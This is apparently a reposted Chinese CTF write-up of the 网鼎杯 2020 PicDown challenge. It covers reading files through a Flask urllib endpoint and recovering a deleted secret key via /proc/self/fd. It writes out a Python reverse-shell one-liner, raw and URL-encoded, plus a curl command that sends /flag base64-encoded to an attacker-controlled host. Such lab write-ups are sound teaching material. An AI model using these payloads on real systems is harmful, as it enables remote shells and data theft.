当前位置: 首页 > article >正文

[网鼎杯 2020 白虎组]PicDown1 [反弹shell] [敏感文件路径] [文件描述符]

article 2025/4/2 2:05:47

 常见读取路径

/etc/passwd=====一些用户和权限还有一些乱七八糟的

/proc/self/cmdline=====包含用于开始当前进程的命令

/proc/self/cwd/app.py======当前工作目录的app.py   

/proc/self/environ=====包含了可用进程的环境变量

/proc/pid/exe =====包含了正在进程中运行的程序链接;
/proc/pid/fd/ =====这个目录包含了进程打开的每一个文件的链接;
/proc/pid/mem =====包含了进程在内存中的内容;
/proc/pid/stat =====包含了进程的状态信息;
/proc/pid/statm =====包含了进程的内存使用信息。

非预期解:url=/flag 出flag

网站功能: 

<html>
<meta http-equiv="refresh" content="0;url=http://www.baidu.com/">
</html>

网站功能:刷新界面并跳转到百度

 读取passwd

 读取环境变量

/proc/self/environ

self位置为PID:代表进程 ID(Process ID),是系统为每个正在运行的进程分配的唯一标识符

若一个进程的 ID 是 1234,那么该进程的相关信息就存储在 /proc/1234 目录下

环境变量里面的 PWD=/app  这里告诉我们这是在/app目录下进行的

该环境变量表示 当前工作目录(Present Working Directory),即进程所在的文件系统路径。

  • /app 是当前进程的根目录或应用程序的主目录(常见于容器化环境,如 Docker)。

  • 当用户在终端中执行命令时,默认操作路径即 PWD 的值。

 读取启动当前进程的完整命令

/proc/self/cmdline

读取app.py文件:

/proc/self/cwd/app.py

cwd 代表 “Current Working Directory”(当前工作目录)
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

补充一点urllib的知识

python2中urlliburlopen可以直接通过文件路径读取文件

漏洞所在处

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)

文件描述符未关闭:代码打开文件后未显式关闭,导致文件描述符在os.remove()时可能仍处于打开状态。

已删除文件的可读性:在Unix系统中,若文件被删除但有进程仍持有其文件描述符,可通过/proc访问该描述符读取内容。

正常情况下应该是用f.close()
或者用with语句自动实现文件描述符的关闭
如:

with open(SECRET_FILE) as f:
    SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)  # 确保在文件关闭后删除

关于文件描述符

文件描述符是什么:

文件描述符(File Descriptor)是操作系统分配给已打开文件的“临时编号”(类似你去银行办事时拿到的排队号码)。程序通过这个编号操作文件(读/写)。

文件描述符未关闭会发生什么:

当一个程序(如 Python 脚本)打开了一个文件(如 open("/tmp/secret.txt")),但未显式调用 f.close() 或未使用 with 语句自动关闭文件时,操作系统会认为该文件仍被占用(仍然在使用中)。此时,即使代码中调用了 os.remove(SECRET_FILE) 删除了文件,实际文件内容仍可能通过未关闭的文件描述符被读取到(其内容仍会残留在磁盘上)。

我们可以通过访问/proc/self/fd/<文件描述符>来访问某个特定的文件

怎么获取这次的文件描述符:

。。。枚举

获取key

/proc/self/fd/3

fd为文件描述符(file descriptors)

 输入key并执行命令,但是没有回显,此时考虑到反弹shell

第一种解法:python反弹shell

注意:这里的key和shell需要经过url编码!因为key中会存在+/=等符号,需要编码后才行

编码前

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0=

&shell=python -c 

'import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("xxxxxxxxx",8888));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/sh","-i"]);'

编码后 

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D
&shell=python%20%2Dc%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22xx%2Exxx%2Exxx%2Exx%22%2C8888%29%29%3Bos%2Edup2%28s%2Efileno%28%29%2C0%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C1%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C2%29%3Bp%3Dsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%29%3B%27

腾讯云服务器的一些问题

第一次整服务器遇到一些困扰我的问题,浅写一下这次是怎么解决的:

问题一:端口是4567或者3333在bp中发送请求的时候一直不行,半天没回应

换成8888,我也不知道为啥我这只有8888能成功。。。明明其他端口的防火墙都放开了。。

问题二:如图,是困扰我最久的一个

8888端口已经被占用了,一查还是宝塔面板占用的,你要是把它kill掉吧,你的宝塔面板一转头又有新的进程了,怎么杀都杀不死

 杀不死咱就绕过嘛嘿嘿,宝塔面板默认端口是8888,把它改成其他的

然后8888就能正常监听啦 

问题三:怎么结束监听

无意间摁了个 control+C 然后自己结束了。。?

踏马的,终于反弹出来了,终于看到这个Connection received了。遥想当年青龙组那道note题反弹了一个星期都没反弹个p出来,激动的要掉小珍珠了 

第二种解法:curl反弹shell

注意还是要编码 还要base64编码输出,不编码就输出不出来(为啥)

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D&shell=curl%20xxxx:8888/`cat%20/flag|base64`

命令自己改

本题总结: 

 


http://www.kler.cn/a/600981.html

相关文章:

  • 2、二分和贪心
  • S32K3 RAM ECC 的问题
  • 《似锦》:曹兴昱—残暴和孝顺并不冲突家庭成长环境分析以命抵命逻辑悖论
  • 代码随想录Day23
  • Scrapy——Redis空闲超时关闭扩展
  • Spring 源码硬核解析系列专题(三十二):Spring Cloud LoadBalancer 的负载均衡源码解析
  • 数据库的操作,以及sql之DML
  • Linux输入系统应用编程
  • 字符串常量,数组和指针的不同形式
  • uv:Rust 驱动的 Python 包管理新时代
  • 飞书只有阅读权限的文档下载,飞书文档下载没有权限的文件
  • Qt 线程类
  • 详解c++20的协程,自定义可等待对象,生成器详解
  • <tauri><rust><GUI>基于rust和tauri,实现多窗口与窗口间通信
  • ISIS-2 邻居建立关系
  • Python 编程中函数嵌套的相关解析
  • React 中React.memo的作用,如何利用它进行组件性能优化?
  • 单片机中C++的局部static变量的初始化仍然遵循控制流
  • Python爬虫异常处理:自动跳过无效URL
  • 2021年蓝桥杯第十二届CC++大学B组真题及代码